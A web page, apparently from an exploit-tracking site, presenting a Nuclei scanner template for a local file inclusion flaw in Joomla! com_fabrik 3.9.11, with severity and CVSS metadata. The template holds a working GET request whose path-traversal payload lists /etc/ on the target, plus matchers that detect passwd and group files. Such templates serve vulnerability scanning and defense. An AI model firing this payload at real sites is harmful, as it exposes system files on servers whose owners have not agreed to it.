joomla-com-fabrik-lfi: Joomla! com_fabrik 3.9.11 - Local File Inclusion

2025-08-01 Joomla! com_fabrik PoC Public

Description

Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.

PoC

id: joomla-com-fabrik-lfi

info:
  name: Joomla! com_fabrik 3.9.11 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48263
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: joomla,lfi,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":"passwd"'
          - '"value":"group"'
          - '"disable":false'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008e6ca463a90ec4ab45b056c6a0b7cfcfdf3412b22eac0b9395b8493b44c71cf5022100af03c40320954112df4c6f36c52aa65f9f05ca70a802d8d459f36bd42dbf333c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities